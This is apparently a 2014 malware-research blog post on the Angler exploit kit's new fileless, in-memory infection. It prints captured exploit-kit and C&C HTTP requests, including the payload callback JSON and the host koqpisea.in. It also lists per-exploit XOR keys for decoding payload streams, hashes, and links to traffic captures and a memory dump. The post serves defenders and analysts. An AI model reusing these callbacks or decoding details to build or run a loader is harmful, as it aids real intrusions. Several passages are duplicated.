2014-08-31 - Evolution
Angler EK : now capable of "fileless" infection (memory malware)
 |
| Matrix - Agent Jackson avoiding bullets |
Few days ago I spotted a new pattern in some Angler EK threads :
 |
| New pattern in a Vawtrak Thread from Angler EK Fired : CVE-2013-2551 - 2014-08-28 |
 |
| New pattern in another Vawtrak Thread from Angler EK Fired : CVE-2014-0515 - 2014-08-29 |
GET http://rwvs30r2zq.akdnbfb .com/qpbv8tg4ee/count?b=1 HTTP/1.1
Accept: */*
Referer: http://rwvs30r2zq.akdnbfb .com/qpbv8tg4ee
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: rwvs30r2zq.akdnbfb.com
Connection: Keep-Alive
Wondering what it was and going over different infections paths I spotted only one thread without this "new" count?b. [Note : on the 2014-08-31 count?b appeared on that thread too]
 |
| Angler EK - 2014-08-28 "Memory Malware" thread |
Exploits' hashes were the same as on all other threads but my usual tools were not able to gather the payload and what surprised me more is that HIPS (like Faronics antiexec) were bypassed (note : I tried Malwarebytes AntiExploit and it was able to spot the ROP and Stack pivoting)
I spent some time to figure out what was happening here :
Angler EK is now able to infect an host without writing the malware on the drive (it's injected directly in the process running the exploited plugin)
 | ||
| Angler EK (no landing on this screen, CVE-2014-0515 fired) and Call back from the malware injected in Internet Explorer 2nd Stage drop : 275c5f650261e80d864faf7cc6b70774 injecting itself to explorer and then gathering Necurs on the same C&C (e.g. : be84c4689912d5689283b4b7efcaf8f2 - 2014-08-28 , b0e3e860a2dc62cb40fd6ef897ad592b 2014-08-29 , 5830dfde30873176d05604677bab6bd9 2014-08-30) |
 |
| FileReplaceA "flood" operation |
Malware call back in https to koqpisea.in :
217.23.3.204
49981 | 217.23.0.0/20 | WORLDSTREAM | NL | WORLDSTREAM.NL | WORLDSTREAM
Call for 2nd Stage payload looks like :
POST https://koqpisea.in/ HTTP/1.1
Host: koqpisea.in
Content-Length: 94
Connection: Keep-Alive
Cache-Control: no-cache
{"protocolVersion":1,"buildId":1049,"id":"35d1754a1c4672f2","tags":[{"type":"dll","64bit":0}]}
This feature opens a wide range of possibilities. Aside being a powerful way to bypass some AV, an ideal way for one time stealer or loader (Pony, Jolly Roger, Andromeda, Smoke Bot, etc..), it also allows a detailed check of the infected host before being a little more noisy and writing anything on disk. It makes it also difficult to grab the dropper (you have to get it from the memory or from the recorded traffic then decode it). This is a powerful move for the attack side.
Additional illustrations :
 |
| Injected plugin-container calling C&C after successful "memory malware" infection via Silverlight on Firefox and Windows 7 2014-08-30 |
 |
| Image : Courtesy of Will Metcalf from Emerging Threats Java calling payload then "Memory payload" activity captured by his Cuckoo instance 2014-08-28 |
<edit >
The encoded stream that is usually containing the Xored + shift byte malware is different in this configuration.
In Angler each exploit has its own Xor key :
CVE-2013-2551 = "adR2b4nh"
CVE-2014-0515 = "wT6QtySY"
CVE-2014-0322 = "laspfnfd"
Java = "FroSHu9h"
Silverlight = "aldonjfg"
The stream now starts with a Xored Shellcode (which has been spotted by EKWatcher as early as 2014-08-18 in thread fed by Adnxs (app Nexus) malvertising )
After a Xor and split operation (Disclaimer : it could be not enough to get the real DLL as Angler has an history of doing more than just a Xor)
Stream Shellcode 32bits
Xored MZ part : 32f4a876c1819713d13e1d14d8cb0a02
That encoded DLL is the same threat as the one called after infection (waiting for a proper name by AV). String spotted : C:\Remedies\And.pdb
David Sanchez (Malwarebytes) figured out that the payload is hooking the kernel32!Exit!Process.
explaining why Iexplore was still loaded when browser was closed.
If the victim's OS is 64 bits then a 64bits shellcode and 64bits version of the dll is being sent :
Unamed Distribution bot (64bits variant) : 1b4cbec2a2d634ae257a760d43ba6bc5
It seems that the call back C&C is operated by the Angler EK guys and is a kind of "Distribution botnet" (or loader in "Caas" mode)
</edit>
The encoded stream that is usually containing the Xored + shift byte malware is different in this configuration.
In Angler each exploit has its own Xor key :
 |
| Xor key in Angler "fileless" thread CVE-2014-0515 stream |
CVE-2013-2551 = "adR2b4nh"
CVE-2014-0515 = "wT6QtySY"
CVE-2014-0322 = "laspfnfd"
Java = "FroSHu9h"
Silverlight = "aldonjfg"
The stream now starts with a Xored Shellcode (which has been spotted by EKWatcher as early as 2014-08-18 in thread fed by Adnxs (app Nexus) malvertising )
 |
| 32 bits version of the stream after a XOR pass. First part is a Shellcode. Second part is a Dll |
Stream Shellcode 32bits
Xored MZ part : 32f4a876c1819713d13e1d14d8cb0a02
That encoded DLL is the same threat as the one called after infection (waiting for a proper name by AV). String spotted : C:\Remedies\And.pdb
David Sanchez (Malwarebytes) figured out that the payload is hooking the kernel32!Exit!Process.
explaining why Iexplore was still loaded when browser was closed.
If the victim's OS is 64 bits then a 64bits shellcode and 64bits version of the dll is being sent :
 |
| Angler EK 2014-09-04 In bold Green : - Encoded stream - Same Distribution threat as the encoded one, downloaded from the C&C - Asterope |
Unamed Distribution bot (64bits variant) : 1b4cbec2a2d634ae257a760d43ba6bc5
</edit>
Credits: Thanks to Will Metcalf (Emerging Threats) and Mieke Verburgh (Malwarebytes) for help and advices.
Thanks to EkWatcher and David Sanchez (Malwarebytes) for informations and an insight on the "RE" side of this thread
Thanks to EkWatcher and David Sanchez (Malwarebytes) for informations and an insight on the "RE" side of this thread
Files:
AnglerEK_MM_2014-08-31 (Fiddlers + bot + C&C calls - Owncloud)
AnglerEK_MM_2014-09-05 (2addionnal fiddler, 64bits streams and C&C callback - Owncloud)
If you want to play with Volatility or whatever, here is the memory (Mega) of a VM when IE was injected and calling C&C (IE pid : 860)
AnglerEK_MM_2014-08-31 (Fiddlers + bot + C&C calls - Owncloud)
AnglerEK_MM_2014-09-05 (2addionnal fiddler, 64bits streams and C&C callback - Owncloud)
If you want to play with Volatility or whatever, here is the memory (Mega) of a VM when IE was injected and calling C&C (IE pid : 860)
 |
| Capture of Fiddler just before pausing the VM 2014-08-30 |
<edit 2014-09-26>
<edit 2014-09-29>
That was inevitable, this is happening. Filess Poweliks meets Filess Angler EK thread. Combo ! pic.twitter.com/5mobHrlt27
— kafeine (@kafeine) September 26, 2014</edit><edit 2014-09-29>
Bedep ! The distribution botnet tied to most of the fileless Angler EK threads has a name now ! Thx @eset pic.twitter.com/Sw2a8sxgfS
— kafeine (@kafeine) September 29, 2014 </edit>Read More:
The Hunt for Memory Malware - 2013-11-06 - Albert Fruz
In-Memory Execution of an Executable - Amit Malik - SecurityXploded
A unique 'bodiless' bot attacks news site visitors - 2012-03-06 Segey Golovanov - Securelist
A unique 'bodiless' bot attacks news site visitors - 2012-03-06 Segey Golovanov - Securelist